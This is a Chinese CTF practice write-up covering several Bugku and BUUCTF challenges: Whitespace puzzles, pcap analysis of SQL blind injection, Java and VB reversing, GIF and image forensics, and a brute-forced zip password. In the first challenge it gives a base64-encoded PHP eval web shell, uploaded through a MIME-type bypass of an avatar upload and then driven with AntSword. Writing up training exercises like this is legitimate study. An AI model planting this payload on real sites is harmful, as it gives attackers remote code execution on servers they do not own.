1.Bugku刷题
xxx二手交易市场
WP
很接近真实的一道题,这道题最难的地方在于找注入点。
先注册个账号,登陆进去。在个人资料那块可以上传头像,有可能是个文件上传漏洞。
经过尝试,发现在上传图片时会将图片内容base64编码。
图片转成base64编码的格式:data:image/jpeg;base64
在网页源码中,发现仅限定上传的文件类型为:"image/*",所以将图片类型改为"image/php"即可。
所以构造payload
image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==
然后用蚁剑连接。
1-1
瑞士军刀
1-2
Snowfall
知识点:whitespace
whitespace在线编译
wp
把step1放进去run一下。
1-3
给了一个密钥H0wt0Pr1ntAWh17e5p4ceC0de,再把step2放进去。
1-4
发现7z和flag.txt,应该是个压缩包,step1给的就是解压密码。
1-5
说白了就是把printc输出的数字按顺序记录一下。
[55,122,188,175,175-136,28,0,4,233,178,103,148,176,0,0,0,0,0,0,0,106,0,0,0,0,0,0,0,205,61,162,91,148,163,10,161,6,123,111,146,146+49,146+49+34,199,77,197,176,226,227,44,177,43,96,96+65,183,25,95,211,125,125+96,70,102,117,157,157+62,2,113,89,134,199,190,90,208,208-95,208-95-111,30,131,134,158,192,184,130,200,200-151,95,169,69,184,36,202,202-133,2,2+67,160,13,36,13,176,115,55,167,181,220,220-76,24,156,128,159,52,143,143-79,170,177,64,129,83,122,169,169+83,159,170,33,201,53,141,86,73,35,149,56,209,111,227,46,146,218,18,60,77,165,165-142,248,248-210,248-210+175,201,136,18,18+231,150,90,225,225+30,225+30-60,101,23,65,13,144,238,93,93-62,93-62+119,182,136,40,73,137,105,218,218-218,0+3,2,92,123,123+127,128,137,207,217,187,15,15+187,15+187-48,187,172,229,221,223,77,58,56,62,234,238,238-63,206,236,90,65,197,234,53,242,98,189,93,69,135,58,1,1+3,6,0,1,9,128,176,0,7,11,1,1-1,2,2+34,6,6+235,7,1,18,18+65,15,181,85,78,250,249,198,199,186,171,74,81,185,17,229,245,136,33,33,1,0,0+1,1-1,0+12,128,162,131,85,0,8,10,1,1+125,78,78-65,98,0,0,5,1,1+16,19,0,102,0,108,0,97,0,103,0,46,0,116,0,120,0,116,0,0,0,25,0,20,10,1,0,50,92,151,50,148,119,119+96,1,21,6,6-5,0,0+32,0,0,0,0,0]
然后写个脚本把跑出来。
x=[55,122,188,175,175-136,28,0,4,233,178,103,148,176,0,0,0,0,0,0,0,106,0,0,0,0,0,0,0,205,61,162,91,148,163,10,161,6,123,111,146,146+49,146+49+34,199,77,197,176,226,227,44,177,43,96,96+65,183,25,95,211,125,125+96,70,102,117,157,157+62,2,113,89,134,199,190,90,208,208-95,208-95-111,30,131,134,158,192,184,130,200,200-151,95,169,69,184,36,202,202-133,2,2+67,160,13,36,13,176,115,55,167,181,220,220-76,24,156,128,159,52,143,143-79,170,177,64,129,83,122,169,169+83,159,170,33,201,53,141,86,73,35,149,56,209,111,227,46,146,218,18,60,77,165,165-142,248,248-210,248-210+175,201,136,18,18+231,150,90,225,225+30,225+30-60,101,23,65,13,144,238,93,93-62,93-62+119,182,136,40,73,137,105,218,218-218,0+3,2,92,123,123+127,128,137,207,217,187,15,15+187,15+187-48,187,172,229,221,223,77,58,56,62,234,238,238-63,206,236,90,65,197,234,53,242,98,189,93,69,135,58,1,1+3,6,0,1,9,128,176,0,7,11,1,1-1,2,2+34,6,6+235,7,1,18,18+65,15,181,85,78,250,249,198,199,186,171,74,81,185,17,229,245,136,33,33,1,0,0+1,1-1,0+12,128,162,131,85,0,8,10,1,1+125,78,78-65,98,0,0,5,1,1+16,19,0,102,0,108,0,97,0,103,0,46,0,116,0,120,0,116,0,0,0,25,0,20,10,1,0,50,92,151,50,148,119,119+96,1,21,6,6-5,0,0+32,0,0,0,0,0]
flag1=b""
for i in x:
flag1+=i.to_bytes(1,'big')
out=open("flag1.7z","wb")
out.write(flag1)
解压压缩包,flag.txt还是whitespace程序。再继续跑一下。
跟第二步一样,再重复一遍即可。
y=[98,117,103,107,117,123,70,49,120,65,110,69,53,111,108,97,110,103,80,114,48,103,114,52,109,84,48,67,97,112,55,117,114,101,84,104,51,70,49,52,103,125]
flag2=b""
for i in y:
flag2+=i.to_bytes(1,'big')
out=open("flag2.txt","wb")
out.write(flag2)
可爱的故事
我傻了,提瓦特语言加密。。。
我原神56级都没认出来。。。
有兴趣的做一做好了。。。
bugku{iamlearningteyvatinbugku}
blind_injection
pcap文件,拿wireshark打开。题目是盲注,那这大概就是一次盲注产生的数据流。
既然跟注入相关,那线索应该在http流中,到处http流查看。
1-6
sql盲注是采用类似于爆破的方式,所以我们只需要查看返回正确的包。按大小排序即可。
1-7
emails,flag_e62d3.....a641,referers,u......
Easy_vb
用IDA打开。
emmmmmmmmmmmm,直接搜索"{"就出来了。
1-8
记得把前边的改成flag。
2.BUUCTF刷题
Java逆向解密
在IDEA中打开类文件,查看算法。
import java.util.ArrayList;
import java.util.Scanner;
public class Reverse {
public Reverse() {
}
public static void main(String[] args) {
Scanner s = new Scanner(System.in);
System.out.println("Please input the flag :");
String str = s.next();
System.out.println("Your input is :");
System.out.println(str);
char[] stringArr = str.toCharArray();
Encrypt(stringArr);
}
public static void Encrypt(char[] arr) {
ArrayList<Integer> Resultlist = new ArrayList();
for(int i = 0; i < arr.length; ++i) {
int result = arr[i] + 64 ^ 32;
Resultlist.add(result);
}
int[] KEY = new int[]{180, 136, 137, 147, 191, 137, 147, 191, 148, 136, 133, 191, 134, 140, 129, 135, 191, 65};
ArrayList<Integer> KEYList = new ArrayList();
for(int j = 0; j < KEY.length; ++j) {
KEYList.add(KEY[j]);
}
System.out.println("Result:");
if (Resultlist.equals(KEYList)) {
System.out.println("Congratulations!");
} else {
System.err.println("Error!");
}
}
}
写个py脚本把flag跑出来即可。
x=[180, 136, 137, 147, 191, 137, 147, 191, 148, 136, 133, 191, 134, 140, 129, 135, 191, 65]
flag = ""
for i in x:
flag += chr(i - ord('@') ^ 0x20)
print(flag)
金三胖
gif动图中有很明显的闪烁,应该是中间穿插了图片。
找一个gif在线分解器即可得到falg。要注意区分l和1。
二维码
用binwalk扫描发现有内含文件,使用foremost分离,得到一个加密压缩包,密码为4个数字,直接用Ziperello爆破即可。//密码为7639.
最后得到的flag要把前边的CTF换成flag提交。
